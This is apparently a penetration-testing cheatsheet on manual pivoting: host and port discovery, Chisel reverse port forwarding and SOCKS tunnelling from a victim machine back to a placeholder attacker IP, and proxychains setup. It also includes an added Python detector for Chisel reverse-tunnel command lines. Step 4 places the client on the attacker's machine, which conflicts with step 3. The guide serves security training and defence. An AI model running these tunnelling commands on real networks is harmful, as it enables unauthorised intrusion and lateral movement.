# Pivoting

Pivoting is a crucial technique in ethical hacking and penetration testing, allowing attackers to extend their reach within a network. This cheatsheet outlines the process of pivoting manually, without relying on tools like Metasploit. The steps are:

#### 1. Discover Active Machines

* Use the `host_discovery.sh` script to ping all IPs on the specified network.
* Example:

  ```bash
  bash host_discovery.sh 10.10.2
  ```

#### 2. Discover Open Ports

* Utilize the `port_discovery.sh` script to discover open ports on the active machines.
* Example:

  ```bash
  bash port_discovery.sh <IP_ADDRESS>
  ```

#### 3. Port Forwarding with Chisel

* Download and use Chisel for port forwarding. Transfer the Chisel binary to the victim machine.
* On the attacker's machine:

  ```bash
  ./chisel server --reverse -p 1234
  ```
* On the victim machine:

  ```bash
  ./chisel client <ATTACKER_IP>:1234 R:80:<TARGET_IP>:80
  ```

#### 4. Tunneling Networks

<figure><img src="https://2308035028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FWeYzWCIl8fzqyot9mus5%2Fuploads%2F13tf0X1HPyj6N0bp0TJi%2Fimage.png?alt=media&#x26;token=3f5173df-75d1-41e2-b4d5-b1deb9e04704" alt=""><figcaption></figcaption></figure>

* Create a tunnel between networks using Chisel for network pivoting.
* On the attacker's machine:

  ```bash
  ./chisel client <ATTACKER_IP>:1234 R:socks
  ```
* Modify `/etc/proxychains.conf` to use the created tunnel.

<figure><img src="https://2308035028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FWeYzWCIl8fzqyot9mus5%2Fuploads%2FAzlg40m3UzRsZ08btAvl%2Fimage.png?alt=media&#x26;token=a0aef26f-a461-4bac-b821-b8542c81290b" alt=""><figcaption><p>uncomment this line</p></figcaption></figure>

<figure><img src="https://2308035028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FWeYzWCIl8fzqyot9mus5%2Fuploads%2FEQf510bajdOyiy1Ld5k3%2Fimage.png?alt=media&#x26;token=e0c6cf9f-af71-45a4-b447-bbcdc58ea6e5" alt=""><figcaption><p>at the end of the file</p></figcaption></figure>

<figure><img src="https://2308035028-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FWeYzWCIl8fzqyot9mus5%2Fuploads%2FIRhr46jggm7VCuc7R3Al%2Fimage.png?alt=media&#x26;token=99033461-e018-499f-9174-ab980e273eb4" alt=""><figcaption><p>Result</p></figcaption></figure>
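From the defender's side, the Chisel client invocations in steps 3 and 4 leave a recognizable argument shape in process-creation logs. The following is an added example, not part of the original cheatsheet: it flags reverse remotes (`R:...`) after a `client` subcommand by argument shape rather than by binary name. The log line format, the sample events and the function name are assumptions constructed for illustration.

```python
import re
import shlex

# Chisel reverse remote: R:[[local-host:]local-port:]<host>:<port> or ...socks,
# with an optional /tcp or /udp suffix. Matching the argument shape still works
# when the binary on disk is not called "chisel".
REVERSE_REMOTE = re.compile(
    r"^R:(?:(?:[\w.\-]+:)?\d{1,5}:)?"
    r"(?:(?P<socks>socks)|(?P<host>[\w.\-]+):(?P<port>\d{1,5}))"
    r"(?:/(?:tcp|udp))?$"
)

# Constructed process-creation records: "<time> <host> <command line>".
SAMPLE_EVENTS = [
    "2024-05-01T10:02:11Z web01 ./chisel client 203.0.113.7:1234 R:80:10.10.2.15:80",
    "2024-05-01T10:05:40Z web01 /tmp/upd client 203.0.113.7:1234 R:socks",
    "2024-05-01T10:06:02Z web01 /usr/bin/ssh -R 8080:localhost:80 ops@bastion",
    "2024-05-01T10:07:19Z db01 /usr/bin/mysql client --host 10.10.2.20:3306",
    "2024-05-01T10:09:55Z web01 ./chisel server --reverse -p 1234",
]

def find_reverse_tunnels(events):
    """Return one finding per reverse remote seen after a `client` subcommand."""
    findings = []
    for line in events:
        ts, host, cmdline = line.split(" ", 2)
        argv = shlex.split(cmdline)
        if "client" not in argv[1:]:
            continue
        args = argv[argv.index("client", 1) + 1:]
        hits = [(i, m) for i, a in enumerate(args) if (m := REVERSE_REMOTE.match(a))]
        if not hits:
            continue
        # Options come before positionals, so the server precedes the first remote.
        first = hits[0][0]
        server = args[first - 1] if first > 0 else None
        for _, m in hits:
            findings.append({
                "time": ts, "host": host, "server": server,
                # A SOCKS remote exposes everything the host can reach, not one port.
                "kind": "reverse-socks" if m["socks"] else "reverse-forward",
                "target": "socks" if m["socks"] else f"{m['host']}:{m['port']}",
            })
    return findings

if __name__ == "__main__":
    for finding in find_reverse_tunnels(SAMPLE_EVENTS):
        print(finding)
```

The `server` field gives the outbound destination to correlate with egress firewall or proxy logs for the same host and time window.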

#### Automation with Pivoting\_Enum Bash Script

* Transfer and execute the `pivoting.sh` script on the victim machine.
* Example:

  ```bash
  bash pivoting.sh NETWORK
  ```
